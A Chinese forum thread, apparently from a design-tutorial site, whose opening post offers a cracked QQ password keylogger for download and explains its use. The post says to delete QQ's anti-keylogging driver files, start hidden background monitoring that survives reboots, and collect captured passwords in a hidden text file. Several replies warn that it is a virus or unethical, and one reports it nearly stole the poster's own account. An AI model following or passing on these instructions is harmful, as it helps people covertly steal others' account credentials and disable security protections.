关注微信公众号

免备案网站空间虚拟主机双线空间域名查询PS数码后期
photoshop互助课堂数百G视频教程下载英语培训机构初中英语如何学随时随地聆听大师开讲/课堂
酷素材!视频教程打包下手绘教程抠图教程路径专辑photoshop cs3视频教程

QQ密码键盘记录器 4.1 破解版

NGN QQ密码监控器
最新版本:  4.1

程序为绿色软件,无需安装。
使用方法,点击QQPwd.exe 启动程序  
如果是QQ2005beta3版本,使用前请先删除掉QQ安装目录下的npkcrypt.sys和npkcusb.sys等 *.sys文件  

程序启动后,点击开始监控,监控程序后台运行,然后所有的登陆过的QQ密码都记录在c:qqpass.txt文件里
以后监控程序每次开机会自动运行。然后,你已经可以退出QQpwd这个配置程序了

qqpass.txt属性为隐藏。

注册版本后台运行,没有界面。未注册版本每3分钟弹出注册对话框,如果觉的烦,你或者注册 或者 使用配置程序结束监控.
本帖的地址:http://bbs.jcwcn.com/forum.php?mod=viewthread&tid=11341
跟着教程做一遍,做完的图要到这里评论交作业,教程有看不懂的地方,可以在贴子下面评论

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?[立即注册]

x
酷素材
2006的有没有用啊!要不要删除掉QQ安装目录下的npkcrypt.sys和npkcusb.sys等 *.sys文件
这个我还没测试过,不过你测试后把结果发上来呀
我的金山扫描到3个病毒。。。。。。

还是不要下的好
酷素材
这东西本来就是病毒,呵呵.谁要是把我的号盗走,就惨了.不敢上线.
酷素材
想用这种工具盗人QQ的人真不厚道。建议楼主撤掉它。。。
有点危险,等有人试过再用
怎么没有注册码呀,楼主发个注册码好吗?
原帖由 祁连山 于 2006-4-23 05:37 PM 发表
这东西本来就是病毒,呵呵.谁要是把我的号盗走,就惨了.不敢上线.

我与你在QQ上交流一年多的,从来没有主动看到你的QQ处于上线状态
这东西都发出来!!
还是小心的好。。。。。。。。。

有病毒谁还要啊......还是别尝试的好

jc:pacify jc:pacify jc:pacify jc:pacify jc:pacify

看看

骗子,差点把我自己的号给盗走了